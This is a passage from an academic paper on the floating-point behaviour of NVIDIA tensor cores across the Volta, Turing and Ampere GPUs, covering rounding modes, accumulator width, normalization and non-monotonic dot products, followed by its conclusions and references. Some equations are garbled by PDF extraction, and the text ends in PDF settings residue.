RU, respectively. As round-to-nearest is the default rounding mode in the IEEE 754 standard, we start by testing whether this is the rounding mode used by the tensor cores. This can be verified by setting any two partial products to values such that one of them would be rounded up only if round-to-nearest or round-towards-plus-infinity were used. If the result is rounded down we can conclude that the tensor cores implement either round-towards-zero or round-towards-minus-infinity, but neither round-to-nearest nor round-towards-plus- infinity (Fig. 1B). One such test is to set in (3) b11 = 2, b21 = 2 −23 + 2−24, and the remaining entries in the first column of B to 0. Note that in binary32 arithmetic RN(2+x) > 2 if x > 2 · 2−24 = 2−23, whereas the smallest positive y such that RZ(2+y) > 2 is 2 · 2−23 = 2−22. The choice b21 ¼ 34 � 2�22 is such that x < b21 < y, thus RN(b11+b21) = RU(b11+b21) = 2 + 2 −22 while RZ(b11+b21) = RD(b11+b21) = 2. Running this experiment on tensor cores returns c11 = 2, suggesting that either round-towards-zero or round-towards-minus-infinity is used for the additions in (2). We can discriminate between these two rounding modes by repeating the same experiment on the negative semiaxis (Fig. 1A), which can be achieved by changing the sign of the nonzero elements in B. This experiment produces c11 = −2, and assuming that the rounding mode does not depend on the input, we conclude that the additions in (2) are performed in round-towards-zero. We note that this rounding mode is known to be the cheapest option to implement (Santoro, Bewick & Horowitz, 1989, Sec. 6.1) and is usually chosen for that reason. When tensor cores are used in binary16 mode, the result computed in the format of the internal accumulator of the 5-operand adder has to be rounded to binary16 before being returned. In order to test the rounding mode used by this operation, we set a11 = a12 = 2 −24, b11 = 2 −1, b21 = 2 −2, and the rest of elements of A and B as well as c11 to 0. The exact result of the dot product in this case is 2−25 + 2−26, which is not representable in binary16, and therefore will cause rounding errors in the result. Note that 2�25 þ 2�26 ¼ 34 � 2�24, therefore Figure 1 Demonstration of the possible IEEE 754 rounding modes for different positions of the exact value x; x1 and x2 are the two floating-point numbers closest to x, and xm is the half-way point between them. The dotted arrows surrounding x show the direction in which various rounding modes would round it. (A) Negative axis, x on the left of the middle point; (B) positive axis, x on the right of the middle point; (C) negative axis, x on the right of the middle point; (D) positive axis, x on the left of the middle point. Full-size DOI: 10.7717/peerj-cs.330/fig-1 Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 10/19 http://dx.doi.org/10.7717/peerj-cs.330/fig-1 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ RN(2−25+2−26) = RU(2−25+2−26) = 2−24 while RZ(2−25+2−26) = RD(2−25+2−26) = 0. The fact that tensor cores return 2−24 confirms that round-towards-zero is not used, thereby suggesting that this conversion is performed in software rather than inside the tensor cores, which use round-towards-zero as we have determined above. Figures 1C and 1D show how round-towards-minus-infinity and round-towards-plus- infinity could alternatively be determined by choosing x such that |x| < |xm|. Features of the accumulator We now discuss some tests that allowed to determine various features of the internal accumulator of the 5-operand adder calculating (2). The quotes from NVIDIA that we provided in “Introduction” indicate that the internal accumulation is done in binary32 format; here we show that the internal format used by the accumulator has higher precision and that the partial sums are not normalized. Extra bits in the alignment of significands In order to compute the sum of two floating-point values, the floating-point adder matches the exponents of the two summands by shifting the significand of the number that has the smaller exponent to the right. In general this operation causes loss of information, as the least significant bits of the shifted significand are typically discarded, but it is customary to retain a few of these digits to guard the computation against numerical cancelation and to obtain correct rounding in round-to-nearest, round-towards-plus-infinity, and round-towards-minus-infinity. As tensor cores use truncation in the additions, we know that they do not require any such guard digits for rounding, and we can easily show that in fact they do not implement guard digits at all. If in (3) we set b11 = 1 and c11 = − 1 + 2 −24, the tensor cores return d11 = 2 −23, which represents a relative error of (2−23 − 2−24)/2−24 = 1. Normalization in addition When two floating-point values are added, the significand of the result may become larger than 2 (with m > 2p − 1, where m is an integer significand as in our definitions in “Introduction”), in which case a normalization step (shifting the significand right by one place and increasing the exponent by one) is required (Muller et al., 2018, Sec. 7.3). In an IEEE 754-compliant arithmetic, the result of each partial sum in (2) would be normalized, as floating-point adders always normalize the result in order to produce a normalized floating-point number. But tensor cores compute the whole expression (2) in hardware rather than by means of IEEE 754 elementary arithmetic operations, and it is natural to ask whether each partial result in (2) is normalized or only the final answer is. We can verify this by adding values chosen so to produce different results with and without normalization of the partial sums. In (3) we set c11 = 1 − 2 −24 and the elements of the first column of B to 2−24. Recalling that the values are accumulated on the summand of largest magnitude, we start by examining what would happen if each partial result were normalized. The exact value of the partial sum s = c11 + 2 −24 is 1, and the normalization step would shift the significand by one bit to the right. At this point the three remaining addends would be smaller than the least significant bit of the partial sum, thus adding them to s separately Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 11/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ would have no effect with round-towards-zero. If the partial results were not normalized, on the other hand, the sum of c11 and 2 −24 would be held with one extra bit, and the remaining addends could be added to it. Running this test on tensor cores shows that only the final result of the dot product is normalized. This has probably been done in order to simplify the implementation; a similar choice was made for example in the hardware accelerator for performing vector inner product described by Kim & Kim (2009). Normalization in subtraction As the products in (2) can be positive as well as negative, some of the partial sums can in fact be subtractions. The significand of the difference of two floating-point numbers may be smaller than 1, in which case the result has to be normalized by shifting the significand left and decreasing the exponents accordingly until the result becomes a normal number. We can show that tensor cores do not perform this kind of normalization as follows. If in (3) we set c11 = − 1 + 2 −24, and two of the elements of the first column of B to 1 and −2−24, we have that d11 evaluates to 0 if the partial sums are normalized. Instead, running this experiment on tensor cores yields d11 = 2 −23, which can be explained as follows. When the sum is evaluated as (1 + c11) − 2 −24, then the lack of guard digit implies that 1 + c11 evaluates to 2 −23, and if the partial results were normalized the tensor cores would return 2−23 − 2−24, which can be represented exactly in binary32 format’s precision. If, on the other hand, the sum were evaluated as (−2−24 + 1) + c11, the first sum would return 1 due to the lack of guard digit, and the lack of normalization would not have any effect in this case. We can conclude that the result of the subtraction is not normalized, as long as we assume that the summands in (3) are accumulated on the largest in magnitude in a fixed order. Extra bits for carry out Another question concerns the number of extra bits required due to lack of normalization. If only the final result is normalized, then accumulating k addends requires ⌈log2k⌉ bits for the carry-out bits (Ercegovac & Lang, 2004, Sec. 3.1), and the hardware for accumulating the 5 values in (2) would internally require ⌈log25⌉ = 3 extra carry-out bits at the top of the significand. We can prove that the internal accumulator of the 5-operand adder in tensor cores has at least two extra bits as follows. In (3) we take c11 = 1 + 2 −22 + 2−23, which sets the two least significant bits of the significand to 1, and assign to the first column of B a permutation of the values 1, 1, 1, and 2−23. We consider all four possible permutations of these values in the first column of B, as we assume that the addends apart from the largest in magnitude are not sorted. The main idea is to show that if 1 is added to c11 three times, then the last two bits of c11 are not dropped as they would be if the accumulation were performed using IEEE 754 floating-point arithmetic, as the significand of c11 + 3 > 4 would have to be shifted by two places to the right in order to be normalized. Then, when 2−23 is added at the end, the carry propagates into the third bit from the bottom and therefore is not lost in the final normalization step. If there are 2 extra bits, then all the four possible orderings of the first column of B will return the exact result 4 + 2−21. Running these tests on tensor cores, we found that all four combinations returned the Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 12/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ exact result, thereby proving that the significand of the internal accumulator has at least 2 extra bits for carries. This technique cannot be used to incontrovertibly show that the 5-operand adder has a third extra bit for carries. On the one hand, all inputs to the multi-operand adder must have the most significant bit of the fraction (the implicit bit) set to 1, in order to produce carry that requires all three extra bits, on the other, the result of one of the four products of the form a1kbk1 in (2) must have the least significant bit of the fraction set to 1. As the product of two binary16 numbers can have at most 22 significant digits, no combination of input can produce a partial product with the required characteristics. It is possible, however, to show the presence of the third bit if we assume that the alignment of the significand is always performed so that the most significant bit of the largest summand in the 5-operand adder occupies the left-most position. Since we know that there are two extra bits and no normalization, we can show that there is also a third bit by showing that there is no overflow when each of the four additions in (3) causes carry out. We can set, for example, c11 = 1 + 2 −1 + 2−2 + 2−3, b11 = 1, b21 = 1 + 2 −1, b31 = 1 + 2 −1 + 2−2, and b41 = 1 + 2 −1 + 2−2 + 2−3 and observe that the tensor core returns d11 = 8. If only two extra bits were present, on the other hand, overflow would occur and the adder would incorrectly return d11 = 0. In summary, we can conclude that the internal significand of the tensor cores is most likely 27 bits wide in Volta cards and 28 bits wide in Turing and Ampere cards (see “NVIDIA Turing tensor cores” and “NVIDIA Ampere tensor cores”). It is worth noting at this point that if (1) there is no normalization, (2) the additions in (2) start with the largest value in magnitude, and (3) all of the significands of the addends are shifted right relative to the exponent of the largest value in magnitude, then the order in which the remaining addends are accumulated will not impact the final result. In the test case above, by replacing one of the 2−23 by 1 we can also confirm, using the methods developed in “Rounding Modes in Tensor Core Computations”, that the rounding mode in the final normalization step (internal accumulator conversion to binary32 answer) is round-towards-zero. Monotonicity of dot product The observation in the previous section raises one final question regarding the monotonicity of the sums in (2). The accumulation is monotonic if in floating-point arithmetic the sum x1 + ⋯ + xn is no larger than y1 + ⋯ + yn if xi ≤ yi for all 1 ≤ i ≤ n. We can show that the lack of normalization causes the dot product in tensor cores—and most likely in any other similar architectures in which partial sums are not normalized (Kim & Kim, 2009; Tao et al., 2013; Sohn & Swartzlander, 2016; Kaul et al., 2019)—to behave non-monotonically. Let us consider (3) and set all the elements in the first column of B to 2−24 and then c11 to 1 − 2 −24 and 1 in turn. When c11 = 1 − 2 −24, the difference in exponents guarantees that the values in B are large enough to be added to c11. This causes the result to become larger than 1, requiring a normalization that returns 1 − 2−24 + 3 · 2−24 = 1 + 2−23. On the other hand, when c11 = 1, none of the summands in (3) is large enough to be added to c11, as the elements in the first column of B are all zeroed out Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 13/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ during the significand alignment step of each addition. This happens because the exponent of 1 is larger than that of 1 − 2−24. In summary we have d11 ¼ c11 þ 2�24 þ 2�24 þ 2�24 þ 2�24 ¼ 1 þ 2�23 when c11 ¼ 1 � 2�24; d11 ¼ c11 þ 2�24 þ 2�24 þ 2�24 þ 2�24 ¼ 1 when c11 ¼ 1: These two sets of inputs demonstrate that tensor cores can produce non-monotonic behavior. NVIDIA Turing tensor cores NVIDIA Turing T4 GPUs are equipped with the second generation of tensor cores, which adds an integer matrix multiply-accumulate operation. It is not documented whether the binary16/binary32 tensor core arithmetic in Turing chips differs from that in Volta cards, therefore it is of interest to run the test suite we designed on one of the Turing cards. We ran all the above experiments on an NVIDIA Tesla T4 16GB (Turing microarchitecture) GPU, and noticed that some of the results were different from those obtained on a V100 GPU. We found that this is due to the presence of an additional extra bit of precision at the bottom of the significand of the internal accumulator of the 5-operand adder. This has an impact over several of the tests above: the operation 1 + 2−24 + 2−24, for example, can now be performed exactly because of the presence of the extra bit. The results obtained on the V100 GPU can be replicated by means of a suitable change of the constants that are chosen depending on the number of extra bits in the accumulator. For instance, in the test for the order of operations in “Accuracy of the Dot Products”, the constant 2−24 should be replaced by 2−25, which is the value of the next bit to the right. Using this approach, we found that all the conclusions we drew about the tensor cores in V100 GPUs remain valid for the second version of tensor cores in the T4 GPUs, with the only exception of the extra bit at the bottom of the internal storage of the 5-operand adder. If we denote the fixed-point format with I integer bits and F fraction bits by {I.F}, the significand of the internal format of the 5-operand adder of a V100 GPU has format {3.23} (or {4.23} if 3 extra bits for carries are present as discussed in “Features of the Accumulator”), whereas that of a T4 GPU has format {3.24} (or {4.24}). The final normalization and rounding produce a number whose significand has format {1.23}, which is the format of the significand of a binary32 floating-point number. NVIDIA Ampere tensor cores As shown in Table 1, the Ampere microarchitecture offers four different variants of tensor core operations (input/output format): binary16/binary32, bfloat16/binary32, TensorFloat-32/binary32, and binary64/binary64. In this section we summarize, for each of these four configurations, the results obtained by running our test suite on the A100 GPUs. We refer to the 4-element dot product in (2), even though some of the tensor core operations available on A100 GPUs use input vectors of dimension two or eight, as can be seen in Table 1. In our tests we only use the first few elements of each input vector, so (2) is relevant even when dealing with operations that would require some of the input vectors to have eight elements, as we tacitly assume that all the remaining entries are set to 0. Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 14/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ In binary16/binary32 mode, we found no differences between the Ampere and Turing tensor cores, as all the tests in our suite produce the same results on the two GPUs. Therefore we moved to the other three modes, which are new as they were introduced with the NVIDIA Ampere architecture. We started by adapting our test suite to the bfloat16/binary32 mode. The main difference in this configuration is that the subnormals in bfloat16 are a subset of the subnormals in binary32, whereas all binary16 subnormals were normalized values in binary32. For this reason, in binary16/binary32 mode, we could only observe that binary32 subnormals in the input are preserved in the output. In this mode, however, binary32 subnormal outputs may in principle be produced during the computation from normal inputs, and we can verify that this is indeed the case with the following experiment. If in (2) we set a11 = 2 −126, b11 = 2 −1 (normalized bfloat16 values), and the remaining coefficients to zero, the tensor cores correctly produce the subnormal binary32 result d11 = 2 −127. To summarize, this precision configuration presents the same numerical behavior as the binary16/binary32 configuration in the T4 GPU tensor cores, and an additional test for subnormals confirmed full support for bfloat16 subnormal input and binary32 subnormal output. Next we looked at the A100 with tensor cores configured in TensorFloat-32/binary32 mode. TensorFloat-32 can represent more subnormal values than bfloat16 due to extra 3 bits in the significand (Table 3), and this was taken into account in our tests. The rest of the test suite was run with the same input used for the binary16/binary32 configuration, since the significands are of the same width, and produced the same results. Our conclusion is that the TensorFloat-32/binary32 mode exhibits the same features as the binary16/binary32 configuration in the T4 GPU. The last configuration of the Ampere tensor cores is binary64/binary64. We found that the numerical behavior of this mode differs significantly from that of the other three configurations that are available on these graphic cards. In the multi-operand addition in (2), in particular, we observed that round-to-nearest with ties to even is used, and that the normalization is performed after each addition rather than only once at the end of the computation. As the result of each addition is normalized, no extra bits for carries are required, and the monotonicity issue discussed in “Features of the accumulator” does not occur for this rounding mode. We also note that since accumulation is performed in binary64, there would be no advantage in holding the binary64 products exactly. Moreover, the additions in (2) are not always performed starting from the largest addend, as was the case with the other modes. In summary, our results suggest that in binary64/ binary64 mode the Ampere tensor cores have the same numerical features that a matrix multiply-accumulate operation implemented using IEEE 754-compliant arithmetic operations would have. CONCLUSIONS Our experiments indicate that the tensor cores in the NVIDIA V100 architecture have the following numerical features. The first two of these (except the rounding mode for the second one) are stated in the NVIDIA documentation and are confirmed by our Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 15/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ experiments, while the rest are not documented by NVIDIA and have been revealed by our tests. 1. The binary16 products in (2) are computed exactly, and the results are kept in full precision and not rounded to binary16 after the multiplication. 2. The additions in (2) are performed using binary32 arithmetic with round-towards-zero. 3. Subnormal numbers in binary16 and binary32 are supported. 4. The five summands in (2) are accumulated starting with the largest in absolute value. 5. Only the final result of (2) is normalized; the partial sums are not, and the accumulator has an internal significand that is 27 bits wide to accommodate for carries of the 5-term addition. 6. The dot products in tensor cores are non-monotonic: in some cases, increasing the magnitude of the inputs to (2) reduces the magnitude of the final result, when the summands in (2) are all nonnegative or all nonpositive, The same properties were found in the second generation tensor cores which equip the NVIDIA T4 GPUs, the main difference being one extra bit of precision in the significand of the internal accumulator of the binary32 5-operand adder. In the third generation of tensor cores, available on the NVIDIA A100 GPUs, all features were the same as in the T4, with the exception of the binary64/binary64 tensor cores, which we found are implemented to behave as if implemented in IEEE 754-compliant arithmetic. The test suite that we have developed as part of this work can be used to test various properties of the floating-point arithmetic of future versions of tensor cores as well as similar accelerators. We aim to keep extending our test suite by adding new test cases for standard non-mixed-precision binary32 or binary64 dot product or matrix multiply units, as well as for integer arithmetic. The NVIDIA Turing and Ampere tensor cores, for instance, added support for 4- and 8-bit integer modes (NVIDIA, 2018, 2020b), and rounding issues become relevant when these are used to implement fixed-point arithmetic. ACKNOWLEDGEMENTS The authors thank the University of Manchester for providing access to the NVIDIA V100 graphic cards through the Computational Shared Facility, the IT services of the university for setting up access to the NVIDIA T4 graphic cards through the Amazon Web Services, and the Innovative Computing Laboratory at the University of Tennessee, Knoxville, US for providing access to the NVIDIA A100 graphics cards. ADDITIONAL INFORMATION AND DECLARATIONS Funding Mantas Mikaitis was supported by an EPSRC Doctoral Prize Fellowship and grant EP/P020720/1. Nicholas J. Higham and Srikara Pranesh were supported by Engineering and Physical Sciences Research Council grant EP/P020720/1. Nicholas J. Higham and Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 16/19 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ Massimiliano Fasi were supported by the Royal Society. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: EPSRC: EP/P020720/1. Engineering and Physical Sciences Research Council: EP/P020720/1. Royal Society. Competing Interests Nicholas J. Higham is an Academic Editor for PeerJ Computer Science. Author Contributions � Massimiliano Fasi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Nicholas J. Higham analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Mantas Mikaitis conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Srikara Pranesh analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The repository is available at GitHub and contains the source code used for performing the experiments: https://github.com/mfasi/tensor-cores-numerical-behavior. REFERENCES Abdelfattah A, Anzt H, Boman EG, Carson E, Cojean T, Dongarra J, Gates M, Grützmacher T, Higham NJ, Li S, Lindquist N, Liu Y, Loe J, Luszczek P, Nayak P, Pranesh S, Rajamanickam S, Ribizel T, Smith B, Swirydowicz K, Thomas S, Tomov S, Tsai YM, Yamazaki I, Yang UM. 2020. A survey of numerical methods utilizing mixed precision arithmetic. Available at https://arxiv.org/abs/2007.06674. Arm Ltd. 2020. Arm architecture reference manual. Technical Report ARM DDI 0487F.b (ID040120). Available at https://developer.arm.com/documentation/ddi0487/fb/?lang=en. Basso PM, Dos Santos FF, Rech P. 2020. Impact of tensor cores and mixed precision on the reliability of matrix multiplication in GPUs. IEEE Transactions on Nuclear Science 67(7):1560–1565 DOI 10.1109/TNS.2020.2977583. Blanchard P, Higham NJ, Lopez F, Mary T, Pranesh S. 2020. Mixed precision block fused multiply-add: error analysis and application to GPU tensor cores. SIAM Journal on Scientific Computing 42(3):C124–C141 DOI 10.1137/19M1289546. Ercegovac MD, Lang T. 2004. Digital arithmetic. San Francisco: Morgan Kauffmann. Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 17/19 https://github.com/mfasi/tensor-cores-numerical-behavior https://arxiv.org/abs/2007.06674 https://developer.arm.com/documentation/ddi0487/fb/?lang=en http://dx.doi.org/10.1109/TNS.2020.2977583 http://dx.doi.org/10.1137/19M1289546 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ Google. 2020. System architecture. Available at https://cloud.google.com/tpu/docs/system-architecture (accessed 15 April 2020). Haidar A, Abdelfattah A, Zounon M, Wu P, Pranesh S, Tomov S, Dongarra J. 2018a. The design of fast and energy-efficient linear solvers: on the potential of half-precision arithmetic and iterative refinement techniques. In: Shi Y, Fu H, Tian Y, Krzhizhanovskaya VV, Lees MH, Dongarra J, Sloot PMA, eds. Computational Science—ICCS 2018, Volume 10860 of Lecture Notes in Computer Science. 586–600. Haidar A, Bayraktar H, Tomov S, Dongarra J, Higham NJ. 2020. Mixed-precision solution of linear systems using accelerator-based computing. Epub ahead of print 25 November 2020. Proceedings of the Royal Society A: Mathematical, Physical and Engineering Sciences DOI 10.1098/rspa.2020.0110. Haidar A, Tomov S, Dongarra J, Higham NJ. 2018b. Harnessing GPU tensor cores for fast FP16 arithmetic to speed up mixed-precision iterative refinement solvers. In: Proceedings of the International Conference for High Performance Computing, Networking, Storage, and Analysis, SC18 (Dallas, TX). Piscataway: IEEE, 47:1–47:11. Hickmann B, Bradford D. 2019. Experimental analysis of matrix multiplication functional units. In: Proceedings of the 26th IEEE Symposium on Computer Arithmetic, Kyoto, Japan, 116–119. IEEE. 2019. IEEE standard for floating-point arithmetic, IEEE Std 754-2019 (revision of IEEE Std 754-2008). Piscataway: IEEE. Intel Corporation. 2018. BFLOAT16—hardware numerics definition. Available at https://software. intel.com/en-us/download/bfloat16-hardware-numerics-definition (accessed 15 July 2020). Intel Corporation. 2020. Intel architecture instruction set extensions and future features programming reference. Available at https://software.intel.com/sites/default/files/managed/c5/ 15/architecture-instruction-set-extensions-programming-reference.pdf (accessed 15 July 2020). Jia Z, Maggioni M, Smith J, Scarpazza DP. 2018a. Dissecting the NVidia Turing T4 GPU via microbenchmarking. Available at https://arxiv.org/abs/1903.07486. Jia Z, Maggioni M, Staiger B, Scarpazza DP. 2018b. Dissecting the NVIDIA Volta GPU architecture via microbenchmarking. Available at https://arxiv.org/abs/1804.06826. Kahan WM. 1981. Paranoia. Available at http://www.netlib.org/paranoia/paranoia.b (accessed 15 July 2020). Karpinski R. 1985. Paranoia: a floating-point benchmark. Byte Magazine 10(2):223–235. Kaul H, Anders M, Mathew S, Kim S, Krishnamurthy R. 2019. Optimized fused floating-point many-term dot-product hardware for machine learning accelerators. In: Proceedings of the 26th IEEE Symposium on Computer Arithmetic. Piscataway: IEEE, 84–87. Kim D, Kim L. 2009. A floating-point unit for 4D vector inner product with reduced latency. IEEE Transactions on Computers 58(7):890–901 DOI 10.1109/TC.2008.210. Markidis S, Chien SWD, Laure E, Peng IB, Vetter JS. 2018. NVIDIA tensor core programmability, performance & precision. In: Proceedings of the 32rd IEEE International Parallel and Distributed Processing Symposium Workshops. Piscataway: IEEE, 522–531. Mukunoki D, Ozaki K, Ogita T, Imamura T. 2020. DGEMM using tensor cores, and its accurate and reproducible versions. In: Sadayappan P, Chamberlain BL, Juckeland G, Ltaief H, eds. Proceedings of the International Conference on High Performance Computing. New York: Springer International Publishing, 230–248. Muller J-M, Brunie N, De Dinechin F, Jeannerod C-P, Joldes M, Lefèvre V, Melquiond G, Revol N, Torres S. 2018. Handbook of floating-point arithmetic. Second Edition. Cham: Birkhäuser. Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 18/19 https://cloud.google.com/tpu/docs/system-architecture http://dx.doi.org/10.1098/rspa.2020.0110 https://software.intel.com/en-us/download/bfloat16-hardware-numerics-definition https://software.intel.com/en-us/download/bfloat16-hardware-numerics-definition https://software.intel.com/sites/default/files/managed/c5/15/architecture-instruction-set-extensions-programming-reference.pdf https://software.intel.com/sites/default/files/managed/c5/15/architecture-instruction-set-extensions-programming-reference.pdf https://arxiv.org/abs/1903.07486 https://arxiv.org/abs/1804.06826 http://www.netlib.org/paranoia/paranoia.b http://dx.doi.org/10.1109/TC.2008.210 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ NVIDIA. 2017. NVIDIA Tesla V100 GPU architecture. Available at https://images.nvidia.com/ content/volta-architecture/pdf/volta-architecture-whitepaper.pdf (accessed 15 July 2020). NVIDIA. 2018. NVIDIA Turing GPU architecture. Available at https://www.nvidia.com/content/ dam/en-zz/Solutions/design-visualization/technologies/turing-architecture/NVIDIA-Turing- Architecture-Whitepaper.pdf (accessed 15 July 2020). NVIDIA. 2020a. Multiply-and-accumulate instruction: mma. Available at https://docs.nvidia.com/ cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma (accessed 15 April 2020). NVIDIA. 2020b. NVIDIA A100 tensor core GPU architecture. Available at https://www.nvidia. com/content/dam/en-zz/Solutions/Data-Center/nvidia-ampere-architecture-whitepaper.pdf (accessed 15 July 2020). NVIDIA. 2020c. NVIDIA CUDA Math API. Available at https://docs.nvidia.com/cuda/cuda-math- api/index.html (accessed 15 April 2020). Santoro MR, Bewick G, Horowitz MA. 1989. Rounding algorithms for IEEE multipliers. In: Proceedings of the 9th IEEE Symposium on Computer Arithmetic. Piscataway: IEEE, 176–183. Sohn J, Swartzlander EE. 2016. A fused floating-point four-term dot product unit. IEEE Transactions on Circuits and Systems I: Regular Papers 63(3):370–378 DOI 10.1109/TCSI.2016.2525042. Tao Y, Deyuan G, Xiaoya F, Nurmi J. 2013. Correctly rounded architectures for floating-point multi-operand addition and dot-product computation. In: Proceedings of the 24th International Conference on Application-Specific Systems, Architectures and Processors. 346–355. Tenca AF. 2009. Multi-operand floating-point addition. In: Proceedings of the 19th IEEE Symposium on Computer Arithmetic. Piscataway: IEEE, 161–168. Yan D, Wang W, Chu X. 2020. Demystifying tensor cores to optimize half-precision matrix multiply. In: 2020 IEEE International Parallel and Distributed Processing Symposium, New Orleans, LA, USA. Piscataway: IEEE, 634–643. Fasi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.330 19/19 https://images.nvidia.com/content/volta-architecture/pdf/volta-architecture-whitepaper.pdf https://images.nvidia.com/content/volta-architecture/pdf/volta-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/Solutions/design-visualization/technologies/turing-architecture/NVIDIA-Turing-Architecture-Whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/Solutions/design-visualization/technologies/turing-architecture/NVIDIA-Turing-Architecture-Whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/Solutions/design-visualization/technologies/turing-architecture/NVIDIA-Turing-Architecture-Whitepaper.pdf https://docs.nvidia.com/cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma https://docs.nvidia.com/cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma https://www.nvidia.com/content/dam/en-zz/Solutions/Data-Center/nvidia-ampere-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/Solutions/Data-Center/nvidia-ampere-architecture-whitepaper.pdf https://docs.nvidia.com/cuda/cuda-math-api/index.html https://docs.nvidia.com/cuda/cuda-math-api/index.html http://dx.doi.org/10.1109/TCSI.2016.2525042 http://dx.doi.org/10.7717/peerj-cs.330 https://peerj.com/computer-science/ Numerical behavior of NVIDIA tensor cores Introduction Previous work Results Conclusions flink5 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS 